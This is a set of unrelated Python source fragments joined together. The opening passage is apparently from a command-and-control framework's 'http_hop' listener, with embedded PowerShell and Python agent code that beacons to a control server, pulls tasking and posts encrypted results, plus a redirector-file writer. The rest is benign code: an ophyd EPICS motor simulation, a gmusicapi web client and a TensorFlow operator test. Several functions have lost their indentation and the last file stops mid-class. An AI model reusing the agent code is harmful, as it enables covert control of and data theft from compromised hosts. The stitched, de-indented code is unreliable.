                                    $response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
                                }
                                catch [System.Net.WebException]{
                                    # exception posting data...
                                    if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
                                        # restart key negotiation
                                        Start-Negotiate -S "$ser" -SK $SK -UA $ua
                                    }
                                }
                            }
                        }
                    }
                """
                return updateServers + getTask + sendMessage

            elif language.lower() == 'python':
                updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
                # Single helper used by the Python agent for both GET (tasking)
                # and POST (results) traffic.
                sendMessage = """
def send_message(packets=None):
    # Requests a tasking or posts data to a randomized tasking URI.
    # If packets == None, the agent GETs a tasking from the control server.
    # If packets != None, the agent encrypts the passed packets and
    #    POSTs the data to the control server.

    global missedCheckins
    global server
    global headers
    global taskURIs

    data = None
    if packets:
        data = ''.join(packets)
        # aes_encrypt_then_hmac is in stager.py
        encData = aes_encrypt_then_hmac(key, data)
        data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
    else:
        # if we're GETing taskings, then build the routing packet to stuff info a cookie first.
        #   meta TASKING_REQUEST = 4
        routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
        b64routingPacket = base64.b64encode(routingPacket)
        headers['Cookie'] = "session=%s" % (b64routingPacket)

    taskURI = random.sample(taskURIs, 1)[0]
    requestUri = server + taskURI

    try:
        data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
        return ('200', data)

    except urllib2.HTTPError as HTTPError:
        # if the server is reached, but returns an erro (like 404)
        missedCheckins = missedCheckins + 1
        #if signaled for restaging, exit.
        if HTTPError.code == 401:
            sys.exit(0)

    except urllib2.URLError as URLerror:
        # if the server cannot be reached
        missedCheckins = missedCheckins + 1
        return (URLerror.reason, '')

    return ('', '')
"""
                return updateServers + sendMessage

            else:
                print helpers.color("[!] listeners/http_hop generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module.")
        else:
            print helpers.color('[!] listeners/http_hop generate_comms(): no language specified!')
def start(self, name=''):
"""
Nothing to actually start for a hop listner, but ensure the stagingKey is
synced with the redirect listener.
"""
redirectListenerName = self.options['RedirectListener']['Value']
redirectListenerOptions = helpers.get_listener_options(redirectListenerName)
if redirectListenerOptions:
self.options['RedirectStagingKey']['Value'] = redirectListenerOptions['StagingKey']['Value']
self.options['DefaultProfile']['Value'] = redirectListenerOptions['DefaultProfile']['Value']
redirectHost = redirectListenerOptions['Host']['Value']
uris = [a for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
hopCodeLocation = "%s/data/misc/hop.php" % (self.mainMenu.installPath)
f = open(hopCodeLocation, 'r')
hopCode = f.read()
f.close()
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
hopCode = hopCode.replace('REPLACE_HOP_NAME', self.options['Name']['Value'])
saveFolder = self.options['OutFolder']['Value']
for uri in uris:
saveName = "%s%s" % (saveFolder, uri)
# recursively create the file's folders if they don't exist
if not os.path.exists(os.path.dirname(saveName)):
try:
os.makedirs(os.path.dirname(saveName))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
with open(saveName, 'w') as f:
f.write(hopCode)
print helpers.color("[*] Hop redirector written to %s . Place this file on the redirect server." % (saveName))
return True
else:
print helpers.color("[!] Redirect listener name %s not a valid listener!" % (redirectListenerName))
return False
    def shutdown(self, name=''):
        """
        Nothing to actually shut down for a hop listener: no server thread
        is started by start(), only static redirector files are written.
        """
        pass
| |
# vi: ts=4 sw=4
'''
:mod:`ophyd.controls.cas.motor` - CAS motors
==================================================
.. module:: ophyd.controls.cas.motor
:synopsis: Epics motor-record simulation using the ophyd Channel Access
Server
'''
from __future__ import print_function
from .pv import CasRecord
from .errors import casAsyncCompletion
from ..positioner import (Positioner, )
from ..pseudopos import (PseudoPositioner, )
# MSTA (motor status) bit positions; passed by NAME as keyword arguments to
# CasMotor._update_status(), which sets/clears the corresponding bit.
# Bit 4 is unassigned in this table.
STATUS_BITS = {'direction': 0,  # last raw direction; (0:Negative, 1:Positive)
               'done': 1,  # motion is complete.
               'plus_ls': 2,  # plus limit switch has been hit.
               'homels': 3,  # state of the home limit switch.
               'position': 5,  # closed-loop position control is enabled.
               'slip_stall': 6,  # Slip/Stall detected (eg. fatal following error)
               'home': 7,  # if at home position.
               'enc_present': 8,  # encoder is present.
               'problem': 9,  # driver stopped polling, or hardware problem
               'moving': 10,  # non-zero velocity present.
               'gain_support': 11,  # motor supports closed-loop position control.
               'comm_err': 12,  # Controller communication error.
               'minus_ls': 13,  # minus limit switch has been hit.
               'homed': 14,  # the motor has been homed.
               }
class CasMotor(CasRecord):
    '''A fake EPICS motor record, made available to EPICS by the built-in
    channel access server.

    Keyword arguments are passed to the base class, CasRecord

    Parameters
    ----------
    name : str
        The record name (not including the server prefix)
    positioner : Positioner
        The ophyd :class:`Positioner` to expose to EPICS
    tweak_value : float
        The default tweak value
    '''
    # record type reported to CA clients
    _rtype = 'motor'
    # standard motor-record field names this record exposes
    _fld_readback = 'RBV'
    _fld_tweak_fwd = 'TWF'
    _fld_tweak_rev = 'TWR'
    _fld_tweak_val = 'TWV'
    _fld_egu = 'EGU'
    _fld_moving = 'MOVN'
    _fld_done_move = 'DMOV'
    _fld_stop = 'STOP'
    _fld_status = 'MSTA'
    _fld_low_lim = 'LLS'
    _fld_high_lim = 'HLS'
    _fld_calib_set = 'SET'
    _fld_limit_viol = 'LVIO'
    def __init__(self, name, positioner,
                 tweak_value=1.0,
                 **kwargs):
        # Only a single-axis positioner can be mapped onto one motor record.
        if not isinstance(positioner, Positioner):
            raise ValueError('The positioner must be derived from Positioner')
        elif isinstance(positioner, PseudoPositioner):
            if len(positioner.pseudos) > 1:
                raise ValueError('Cannot use with multiple-pseudo positioner. '
                                 'Instead, create CasMotors on individual axes.')
        self._pos = positioner
        # MSTA bitmask; see STATUS_BITS for the bit layout
        self._status = 0
        # .VAL is initialized to the positioner's current position
        CasRecord.__init__(self, name, self._pos.position,
                           rtype=self._rtype, **kwargs)
        # create the standard motor-record fields and hook up CAS callbacks
        self.add_field(self._fld_readback, self._pos.position)
        self.add_field(self._fld_egu, self._pos.egu)
        self.add_field(self._fld_tweak_val, tweak_value)
        self.add_field(self._fld_tweak_fwd, 0, written_cb=self.tweak_forward)
        self.add_field(self._fld_tweak_rev, 0, written_cb=self.tweak_reverse)
        self.add_field(self._fld_stop, 0, written_cb=lambda **kwargs: self._pos.stop())
        self.add_field(self._fld_moving, self._pos.moving)
        self.add_field(self._fld_done_move, not self._pos.moving)
        self.add_field(self._fld_status, 0)
        self.add_field(self._fld_low_lim, 0)
        self.add_field(self._fld_high_lim, 0)
        self.add_field(self._fld_calib_set, 0)
        self.add_field(self._fld_limit_viol, 0)
        # track the positioner so readback/MSTA follow its state
        self._pos.subscribe(self._readback_updated, event_type=self._pos.SUB_READBACK)
        self._pos.subscribe(self._move_started, event_type=self._pos.SUB_START)
        self._pos.subscribe(self._move_done, event_type=self._pos.SUB_DONE)
        # seed MSTA/MOVN/DMOV from the current motion state
        self._update_status(moving=self._pos.moving)
    def written_to(self, timestamp=None, value=None,
                   status=None, severity=None):
        '''[CAS callback] CA client requested a move by writing to this record
        (or .VAL)
        '''
        # ignore writes that carry an alarm status/severity
        if status or severity:
            return
        if self._check_limits(value):
            # non-blocking move; async_done() fires when the move completes
            self._pos.move(value, wait=False,
                           moved_cb=lambda **kwargs: self.async_done())
        # tell the CAS layer that completion is asynchronous.
        # NOTE(review): this is raised even when the limit check fails --
        # confirm that is the intended behavior.
        raise casAsyncCompletion
def _check_limits(self, pos):
'''Check the position against the limits
Returns
-------
bool
False if the limits are tripped
'''
low_lim, high_lim = self._pos.limits
# TODO: better way to do this. also, limits on .VAL will only update
# when a move request has been started
self.limits.hilim = self.limits.hihi = self.limits.high = high_lim
self.limits.lolim = self.limits.lolo = self.limits.low = low_lim
if low_lim != high_lim:
if pos > high_lim:
self._update_status(minus_ls=0, plus_ls=1)
return False
elif pos < low_lim:
self._update_status(minus_ls=1, plus_ls=0)
return False
self._update_status(minus_ls=0, plus_ls=0)
return True
    def tweak(self, amount):
        '''Performs a tweak of positioner by `amount`.
        The standard motor record behavior is to add the tweak value (.TWV)
        onto the user-request value (.VAL) and move there.
        '''
        # pos = self._pos.position + amount
        pos = self.value + amount
        # NOTE(review): .VAL is updated before the limit check, so a
        # limit-violating tweak still changes the record value even though
        # no move is issued -- confirm this is intended.
        self.value = pos
        if self._check_limits(pos):
            self._pos.move(pos, wait=False)
def tweak_reverse(self, **kwargs):
'''[CAS callback] CA client requested to tweak reverse'''
tweak_val = self[self._fld_tweak_val].value
return self.tweak(-tweak_val)
def tweak_forward(self, **kwargs):
'''[CAS callback] CA client requested to tweak forward'''
tweak_val = self[self._fld_tweak_val].value
return self.tweak(tweak_val)
def _readback_updated(self, value=None, **kwargs):
'''[Pos callback] Positioner readback value has been updated'''
self[self._fld_readback] = value
def _move_started(self, **kwargs):
'''[Pos callback] Positioner motion has started'''
self._update_status(moving=1)
    def _move_done(self, **kwargs):
        '''[Pos callback] Positioner motion has completed'''
        # Clears the moving bit in MSTA and updates moving/done-move fields.
        self._update_status(moving=0)
def _update_status(self, **kwargs):
'''Update the motor status field (MSTA)'''
old_status = self._status
for arg, value in kwargs.iteritems():
bit = STATUS_BITS[arg]
if value:
self._status |= (1 << bit)
else:
self._status &= ~(1 << bit)
field = self[self._fld_status]
if old_status != self._status:
field.value = self._status
moving = kwargs.get('moving', None)
if moving is not None:
self[self._fld_moving] = moving
self[self._fld_done_move] = not moving
plus_ls = kwargs.get('plus_ls', None)
if plus_ls is not None:
self[self._fld_high_lim] = plus_ls
minus_ls = kwargs.get('minus_ls', None)
if minus_ls is not None:
self[self._fld_low_lim] = minus_ls
| |
# -*- coding: utf-8 -*-
from urlparse import urlparse, parse_qsl
import gmusicapi
from gmusicapi.clients.shared import _Base
from gmusicapi.protocol import webclient
from gmusicapi.utils import utils
import gmusicapi.session
class Webclient(_Base):
    """Allows library management and streaming by posing as the
    music.google.com webclient.
    Uploading is not supported by this client (use the :class:`Musicmanager`
    to upload).
    Any methods in this class that are duplicated by
    the :class:`Mobileclient` are deprecated, and will generate a
    warning at runtime.
    The following methods are *not* deprecated:
    * :func:`create_playlist`
    * :func:`get_registered_devices`
    * :func:`get_shared_playlist_info`
    * :func:`get_song_download_info`
    * :func:`get_stream_urls`
    * :func:`get_stream_audio`
    * :func:`report_incorrect_match`
    * :func:`upload_album_art`
    """
    # Session class used by _Base for authentication/cookie handling.
    _session_class = gmusicapi.session.Webclient
    def __init__(self, debug_logging=True, validate=True, verify_ssl=True):
        super(Webclient, self).__init__(self.__class__.__name__,
                                        debug_logging,
                                        validate,
                                        verify_ssl)
    def login(self, email, password):
        """Authenticates the webclient.
        Returns ``True`` on success, ``False`` on failure.
        :param email: eg ``'test@gmail.com'`` or just ``'test'``.
        :param password: password or app-specific password for 2-factor users.
            This is not stored locally, and is sent securely over SSL.
        Users who don't use two-factor auth will likely need to enable
        `less secure login <https://www.google.com/settings/security/lesssecureapps>`__.
        If this is needed, a warning will be logged during login (which will print to stderr
        in the default logging configuration).
        Users of two-factor authentication will need to set an application-specific password
        to log in.
        """
        if not self.session.login(email, password):
            self.logger.info("failed to authenticate")
            return False
        self.logger.info("authenticated")
        return True
    def logout(self):
        # Delegates entirely to the shared _Base logout implementation.
        return super(Webclient, self).logout()
    def create_playlist(self, name, description=None, public=False):
        """
        Creates a playlist and returns its id.
        :param name: the name of the playlist.
        :param description: (optional) the description of the playlist.
        :param public: if True and the user has All Access, create a shared playlist.
        """
        res = self._make_call(webclient.CreatePlaylist, name, description, public)
        # The new playlist id is at a fixed position in the response array.
        return res[1][0]
    def get_shared_playlist_info(self, share_token):
        """
        Returns a dictionary with four keys: author, description, num_tracks, and title.
        :param share_token: from ``playlist['shareToken']``, or a playlist share
          url (``https://play.google.com/music/playlist/<token>``).
          Note that tokens from urls will need to be url-decoded,
          eg ``AM...%3D%3D`` becomes ``AM...==``.
        """
        res = self._make_call(webclient.GetSharedPlaylist, '', share_token)
        # res[1][0] is the track list; res[1][1] is a positional metadata
        # array for the playlist itself.
        num_tracks = len(res[1][0])
        md = res[1][1]
        return {
            u'author': md[8],
            u'description': md[7],
            u'num_tracks': num_tracks,
            u'title': md[1],
        }
    def get_registered_devices(self):
        """
        Returns a list of dictionaries representing devices associated with the account.
        Performing the :class:`Musicmanager` OAuth flow will register a device
        of type ``'DESKTOP_APP'``.
        Installing the Android Google Music app and logging into it will
        register a device of type ``'PHONE'``, which is required for streaming with
        the :class:`Mobileclient`.
        Here is an example response::
            [
              {
                u'date': 1367470393588,           # utc-millisecond
                u'id':   u'AA:BB:CC:11:22:33',
                u'lastUsedMs': 1394138679694,
                u'name': u'my-hostname',
                u'type': u'DESKTOP_APP'
              },
              {
                u'carrier':      u'Google',
                u'date':         1344808742774,
                u'id':           u'0x00112233aabbccdd',  # remove 0x when streaming
                u'manufacturer': u'Asus',
                u'model':        u'Nexus 7',
                u'name':         u'',
                u'type':         u'PHONE'
              },
              {
                u'date': 1394133624308,
                u'id': u'ios:01234567-0123-0123-0123-0123456789AB',
                u'lastUsedMs': 1394138679694,
                u'type': u'IOS'
              }
            ]
        """
        # TODO sessionid stuff
        # Device info is nested in the account settings payload.
        res = self._make_call(webclient.GetSettings, '')
        return res['settings']['devices']
    @utils.enforce_id_param
    def get_song_download_info(self, song_id):
        """Returns a tuple: ``('<url>', <download count>)``.
        :param song_id: a single song id.
        ``url`` will be ``None`` if the download limit is exceeded.
        GM allows 2 downloads per song. The download count may not always be accurate,
        and the 2 download limit seems to be loosely enforced.
        This call alone does not count towards a download -
        the count is incremented when ``url`` is retrieved.
        """
        # TODO the protocol expects a list of songs - could extend with accept_singleton
        info = self._make_call(webclient.GetDownloadInfo, [song_id])
        # 'url' is absent when the download limit is exceeded, hence .get().
        url = info.get('url')
        return (url, info["downloadCounts"][song_id])
    @utils.enforce_id_param
    def get_stream_urls(self, song_id):
        """Returns a list of urls that point to a streamable version of this song.
        If you just need the audio and are ok with gmusicapi doing the download,
        consider using :func:`get_stream_audio` instead.
        This abstracts away the differences between different kinds of tracks:
            * normal tracks return a single url
            * All Access tracks return multiple urls, which must be combined
        :param song_id: a single song id.
        While acquiring the urls requires authentication, retreiving the
        contents does not.
        However, there are limitations on how the stream urls can be used:
            * the urls expire after a minute
            * only one IP can be streaming music at once.
              Other attempts will get an http 403 with
              ``X-Rejected-Reason: ANOTHER_STREAM_BEING_PLAYED``.
        *This is only intended for streaming*. The streamed audio does not contain metadata.
        Use :func:`get_song_download_info` or :func:`Musicmanager.download_song
        <gmusicapi.clients.Musicmanager.download_song>`
        to download files with metadata.
        """
        res = self._make_call(webclient.GetStreamUrl, song_id)
        # Normal tracks respond with a single 'url'; All Access tracks
        # respond with a list under 'urls'.
        try:
            return [res['url']]
        except KeyError:
            return res['urls']
    @utils.enforce_id_param
    def get_stream_audio(self, song_id, use_range_header=None):
        """Returns a bytestring containing mp3 audio for this song.
        :param song_id: a single song id
        :param use_range_header: in some cases, an HTTP range header can be
          used to save some bandwidth.
          However, there's no guarantee that the server will respect it,
          meaning that the client may get back an unexpected response when
          using it.
          There are three possible values for this argument:
              * None: (default) send header; fix response locally on problems
              * True: send header; raise IOError on problems
              * False: do not send header
        """
        urls = self.get_stream_urls(song_id)
        # TODO shouldn't session.send be used throughout?
        if len(urls) == 1:
            return self.session._rsession.get(urls[0]).content
        # AA tracks are separated into multiple files.
        # the url contains the range of each file to be used.
        range_pairs = [[int(s) for s in val.split('-')]
                       for url in urls
                       for key, val in parse_qsl(urlparse(url)[4])
                       if key == 'range']
        stream_pieces = []
        prev_end = 0
        headers = None
        for url, (start, end) in zip(urls, range_pairs):
            if use_range_header or use_range_header is None:
                # Request from the offset continuing the previous piece
                # (presumably 0 for contiguous ranges -- confirm).
                headers = {'Range': 'bytes=' + str(prev_end - start) + '-'}
            audio = self.session._rsession.get(url, headers=headers).content
            if end - prev_end != len(audio) - 1:
                # content length is not in the right range
                if use_range_header:
                    # the user didn't want automatic response fixup
                    raise IOError('use_range_header is True but the response'
                                  ' was not the correct content length.'
                                  ' This might be caused by a (poorly-written) http proxy.')
                # trim to the proper range
                audio = audio[prev_end - start:]
            stream_pieces.append(audio)
            prev_end = end + 1
        return ''.join(stream_pieces)
    @utils.accept_singleton(basestring)
    @utils.enforce_ids_param
    @utils.empty_arg_shortcircuit
    def report_incorrect_match(self, song_ids):
        """Equivalent to the 'Fix Incorrect Match' button, this requests re-uploading of songs.
        Returns the song_ids provided.
        :param song_ids: a list of song ids to report, or a single song id.
        Note that if you uploaded a song through gmusicapi, it won't be reuploaded
        automatically - this currently only works for songs uploaded with the Music Manager.
        See issue `#89 <https://github.com/simon-weber/Unofficial-Google-Music-API/issues/89>`__.
        This should only be used on matched tracks (``song['type'] == 6``).
        """
        self._make_call(webclient.ReportBadSongMatch, song_ids)
        return song_ids
    @utils.accept_singleton(basestring)
    @utils.enforce_ids_param
    @utils.empty_arg_shortcircuit
    def upload_album_art(self, song_ids, image_filepath):
        """Uploads an image and sets it as the album art for songs.
        Returns a url to the image on Google's servers.
        :param song_ids: a list of song ids, or a single song id.
        :param image_filepath: filepath of the art to use. jpg and png are known to work.
        This function will *always* upload the provided image, even if it's already uploaded.
        If the art is already uploaded and set for another song, copy over the
        value of the ``'albumArtUrl'`` key using :func:`Mobileclient.change_song_metadata` instead.
        """
        res = self._make_call(webclient.UploadImage, image_filepath)
        url = res['imageUrl']
        # Point every requested song's albumArtUrl at the uploaded image.
        song_dicts = [dict((('id', id), ('albumArtUrl', url))) for id in song_ids]
        self._make_call(webclient.ChangeSongMetadata, song_dicts)
        return url
    # deprecated methods follow:
    @utils.accept_singleton(basestring)
    @utils.enforce_ids_param
    @utils.empty_arg_shortcircuit
    @utils.deprecated('prefer Mobileclient.delete_songs')
    def delete_songs(self, song_ids):
        """**Deprecated**: prefer :func:`Mobileclient.delete_songs`.
        Deletes songs from the entire library. Returns a list of deleted song ids.
        :param song_ids: a list of song ids, or a single song id.
        """
        res = self._make_call(webclient.DeleteSongs, song_ids)
        return res['deleteIds']
    @utils.accept_singleton(basestring, 2)
    @utils.enforce_ids_param(2)
    @utils.enforce_id_param
    @utils.empty_arg_shortcircuit(position=2)
    @utils.deprecated('prefer Mobileclient.add_songs_to_playlist')
    def add_songs_to_playlist(self, playlist_id, song_ids):
        """**Deprecated**: prefer :func:`Mobileclient.add_songs_to_playlist`.
        Appends songs to a playlist.
        Returns a list of (song id, playlistEntryId) tuples that were added.
        :param playlist_id: id of the playlist to add to.
        :param song_ids: a list of song ids, or a single song id.
        Playlists have a maximum size of 1000 songs.
        """
        res = self._make_call(webclient.AddToPlaylist, playlist_id, song_ids)
        new_entries = res['songIds']
        return [(e['songId'], e['playlistEntryId']) for e in new_entries]
    @utils.accept_singleton(basestring, 2)
    @utils.enforce_ids_param(2)
    @utils.enforce_id_param
    @utils.empty_arg_shortcircuit(position=2)
    @utils.deprecated('prefer Mobileclient.remove_entries_from_playlist')
    def remove_songs_from_playlist(self, playlist_id, sids_to_match):
        """**Deprecated**: prefer :func:`Mobileclient.remove_entries_from_playlist`.
        Removes all copies of the given song ids from a playlist.
        Returns a list of removed (sid, eid) pairs.
        :param playlist_id: id of the playlist to remove songs from.
        :param sids_to_match: a list of song ids to match, or a single song id.
        This is *not always* the inverse of a call to :func:`add_songs_to_playlist`,
        since multiple copies of the same song are removed.
        """
        playlist_tracks = self.get_playlist_songs(playlist_id)
        sid_set = set(sids_to_match)
        # Collect every entry id whose song id matches.
        matching_eids = [t["playlistEntryId"]
                         for t in playlist_tracks
                         if t["id"] in sid_set]
        if matching_eids:
            # Call returns "sid_eid" strings.
            sid_eids = self._remove_entries_from_playlist(playlist_id,
                                                          matching_eids)
            return [s.split("_") for s in sid_eids]
        else:
            return []
    @utils.accept_singleton(basestring, 2)
    @utils.empty_arg_shortcircuit(position=2)
    def _remove_entries_from_playlist(self, playlist_id, entry_ids_to_remove):
        """Removes entries from a playlist. Returns a list of removed "sid_eid" strings.
        :param playlist_id: the playlist to be modified.
        :param entry_ids: a list of entry ids, or a single entry id.
        """
        # GM requires the song ids in the call as well; find them.
        playlist_tracks = self.get_playlist_songs(playlist_id)
        remove_eid_set = set(entry_ids_to_remove)
        e_s_id_pairs = [(t["id"], t["playlistEntryId"])
                        for t in playlist_tracks
                        if t["playlistEntryId"] in remove_eid_set]
        num_not_found = len(entry_ids_to_remove) - len(e_s_id_pairs)
        if num_not_found > 0:
            self.logger.warning("when removing, %d entry ids could not be found in playlist id %s",
                                num_not_found, playlist_id)
        # Unzip the pairs.
        # NOTE(review): zip(*[]) raises if *no* requested entries were found;
        # confirm callers always pass at least one valid entry id.
        sids, eids = zip(*e_s_id_pairs)
        res = self._make_call(webclient.DeleteSongs, sids, playlist_id, eids)
        return res['deleteIds']
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables as variables_module
from tensorflow.python.ops.linalg import linalg as linalg_lib
from tensorflow.python.ops.linalg import linear_operator_test_util
from tensorflow.python.platform import test
# Short alias used throughout the tests.
linalg = linalg_lib
# Seeded RNG so shape/compatibility tests below are deterministic.
rng = np.random.RandomState(0)
class BaseLinearOperatorLowRankUpdatetest(object):
  """Base test for this type of operator."""
  # Subclasses should set these attributes to either True or False.
  # If True, A = L + UDV^H
  # If False, A = L + UV^H or A = L + UU^H, depending on _use_v.
  _use_diag_update = None
  # If True, diag is > 0, which means D is symmetric positive definite.
  _is_diag_update_positive = None
  # If True, A = L + UDV^H
  # If False, A = L + UDU^H or A = L + UU^H, depending on _use_diag_update
  _use_v = None
  @staticmethod
  def operator_shapes_infos():
    # Shapes of the full operator A used by the generated tests.
    shape_info = linear_operator_test_util.OperatorShapesInfo
    # Previously we had a (2, 10, 10) shape at the end.  We did this to test the
    # inversion and determinant lemmas on not-tiny matrices, since these are
    # known to have stability issues.  This resulted in test timeouts, so this
    # shape has been removed, but rest assured, the tests did pass.
    return [
        shape_info((0, 0)),
        shape_info((1, 1)),
        shape_info((1, 3, 3)),
        shape_info((3, 4, 4)),
        shape_info((2, 1, 4, 4))]
  def _gen_positive_diag(self, dtype, diag_shape):
    # Draw strictly-positive diagonal entries in [1e-4, 1); for complex
    # dtypes, sample real values and cast (keeps the diagonal real > 0).
    if dtype.is_complex:
      diag = linear_operator_test_util.random_uniform(
          diag_shape, minval=1e-4, maxval=1., dtype=dtypes.float32)
      return math_ops.cast(diag, dtype=dtype)
    return linear_operator_test_util.random_uniform(
        diag_shape, minval=1e-4, maxval=1., dtype=dtype)
  def operator_and_matrix(self, shape_info, dtype, use_placeholder,
                          ensure_self_adjoint_and_pd=False):
    # Build the operator under test and its dense equivalent.
    # Recall A = L + UDV^H
    shape = list(shape_info.shape)
    diag_shape = shape[:-1]
    # Rank of the update: roughly half the matrix dimension.
    k = shape[-2] // 2 + 1
    u_perturbation_shape = shape[:-1] + [k]
    diag_update_shape = shape[:-2] + [k]
    # base_operator L will be a symmetric positive definite diagonal linear
    # operator, with condition number as high as 1e4.
    base_diag = self._gen_positive_diag(dtype, diag_shape)
    lin_op_base_diag = base_diag
    # U
    u = linear_operator_test_util.random_normal_correlated_columns(
        u_perturbation_shape, dtype=dtype)
    lin_op_u = u
    # V
    v = linear_operator_test_util.random_normal_correlated_columns(
        u_perturbation_shape, dtype=dtype)
    lin_op_v = v
    # D
    if self._is_diag_update_positive or ensure_self_adjoint_and_pd:
      diag_update = self._gen_positive_diag(dtype, diag_update_shape)
    else:
      diag_update = linear_operator_test_util.random_normal(
          diag_update_shape, stddev=1e-4, dtype=dtype)
    lin_op_diag_update = diag_update
    if use_placeholder:
      # Feed all inputs through placeholders with unknown static shape to
      # exercise the dynamic-shape code paths.
      lin_op_base_diag = array_ops.placeholder_with_default(
          base_diag, shape=None)
      lin_op_u = array_ops.placeholder_with_default(u, shape=None)
      lin_op_v = array_ops.placeholder_with_default(v, shape=None)
      lin_op_diag_update = array_ops.placeholder_with_default(
          diag_update, shape=None)
    base_operator = linalg.LinearOperatorDiag(
        lin_op_base_diag,
        is_positive_definite=True,
        is_self_adjoint=True)
    operator = linalg.LinearOperatorLowRankUpdate(
        base_operator,
        lin_op_u,
        v=lin_op_v if self._use_v else None,
        diag_update=lin_op_diag_update if self._use_diag_update else None,
        is_diag_update_positive=self._is_diag_update_positive)
    # The matrix representing L
    base_diag_mat = array_ops.matrix_diag(base_diag)
    # The matrix representing D
    diag_update_mat = array_ops.matrix_diag(diag_update)
    # Set up mat as some variant of A = L + UDV^H
    if self._use_v and self._use_diag_update:
      # In this case, we have L + UDV^H and it isn't symmetric.
      expect_use_cholesky = False
      matrix = base_diag_mat + math_ops.matmul(
          u, math_ops.matmul(diag_update_mat, v, adjoint_b=True))
    elif self._use_v:
      # In this case, we have L + UDV^H and it isn't symmetric.
      expect_use_cholesky = False
      matrix = base_diag_mat + math_ops.matmul(u, v, adjoint_b=True)
    elif self._use_diag_update:
      # In this case, we have L + UDU^H, which is PD if D > 0, since L > 0.
      expect_use_cholesky = self._is_diag_update_positive
      matrix = base_diag_mat + math_ops.matmul(
          u, math_ops.matmul(diag_update_mat, u, adjoint_b=True))
    else:
      # In this case, we have L + UU^H, which is PD since L > 0.
      expect_use_cholesky = True
      matrix = base_diag_mat + math_ops.matmul(u, u, adjoint_b=True)
    # Sanity-check that the operator chose the Cholesky path exactly when
    # the construction above guarantees positive-definiteness.
    if expect_use_cholesky:
      self.assertTrue(operator._use_cholesky)
    else:
      self.assertFalse(operator._use_cholesky)
    return operator, matrix
  def test_tape_safe(self):
    # All inputs are tf.Variables so gradient-tape safety can be verified.
    base_operator = linalg.LinearOperatorDiag(
        variables_module.Variable([1.], name="diag"),
        is_positive_definite=True,
        is_self_adjoint=True)
    operator = linalg.LinearOperatorLowRankUpdate(
        base_operator,
        u=variables_module.Variable([[2.]], name="u"),
        v=variables_module.Variable([[1.25]], name="v")
        if self._use_v else None,
        diag_update=variables_module.Variable([1.25], name="diag_update")
        if self._use_diag_update else None,
        is_diag_update_positive=self._is_diag_update_positive)
    self.check_tape_safe(operator)
class LinearOperatorLowRankUpdatetestWithDiagUseCholesky(
    BaseLinearOperatorLowRankUpdatetest,
    linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
  """A = L + UDU^H, D > 0, L > 0 ==> A > 0 and we can use a Cholesky."""
  _use_diag_update = True
  _is_diag_update_positive = True
  _use_v = False
  def setUp(self):
    # Loosen tolerances: condition numbers as high as 1e4 are exercised.
    for dtype, tol in ((dtypes.float32, 1e-5), (dtypes.float64, 1e-10)):
      self._atol[dtype] = tol
      self._rtol[dtype] = tol
    self._rtol[dtypes.complex64] = 1e-4
class LinearOperatorLowRankUpdatetestWithDiagCannotUseCholesky(
    BaseLinearOperatorLowRankUpdatetest,
    linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
  """A = L + UDU^H, D !> 0, L > 0 ==> A !> 0 and we cannot use a Cholesky."""
  _use_diag_update = True
  _is_diag_update_positive = False
  _use_v = False
  @staticmethod
  def skip_these_tests():
    # The operator may be indefinite, so Cholesky-based checks don't apply.
    return ["cholesky", "eigvalsh"]
  def setUp(self):
    # Even looser tolerances: no Cholesky is available, and condition
    # numbers as high as 1e4 are exercised.
    for dtype, tol in ((dtypes.float32, 1e-4), (dtypes.float64, 1e-9)):
      self._atol[dtype] = tol
      self._rtol[dtype] = tol
    self._rtol[dtypes.complex64] = 2e-4
class LinearOperatorLowRankUpdatetestNoDiagUseCholesky(
    BaseLinearOperatorLowRankUpdatetest,
    linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
  """A = L + UU^H, L > 0 ==> A > 0 and we can use a Cholesky."""
  _use_diag_update = False
  _is_diag_update_positive = None
  _use_v = False
  def setUp(self):
    # Loosen tolerances: condition numbers as high as 1e4 are exercised.
    for dtype, tol in ((dtypes.float32, 1e-5), (dtypes.float64, 1e-10)):
      self._atol[dtype] = tol
      self._rtol[dtype] = tol
    self._rtol[dtypes.complex64] = 1e-4
class LinearOperatorLowRankUpdatetestNoDiagCannotUseCholesky(
    BaseLinearOperatorLowRankUpdatetest,
    linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
  """A = L + UV^H, L > 0 ==> A is not symmetric and we cannot use a Cholesky."""
  _use_diag_update = False
  _is_diag_update_positive = None
  _use_v = True
  @staticmethod
  def skip_these_tests():
    # The operator is not symmetric, so Cholesky-based checks don't apply.
    return ["cholesky", "eigvalsh"]
  def setUp(self):
    # Even looser tolerances: no Cholesky is available, and condition
    # numbers as high as 1e4 are exercised.
    for dtype, tol in ((dtypes.float32, 1e-4), (dtypes.float64, 1e-9)):
      self._atol[dtype] = tol
      self._rtol[dtype] = tol
    self._atol[dtypes.complex64] = 1e-5
    self._rtol[dtypes.complex64] = 2e-4
class LinearOperatorLowRankUpdatetestWithDiagNotSquare(
    BaseLinearOperatorLowRankUpdatetest,
    linear_operator_test_util.NonSquareLinearOperatorDerivedClassTest):
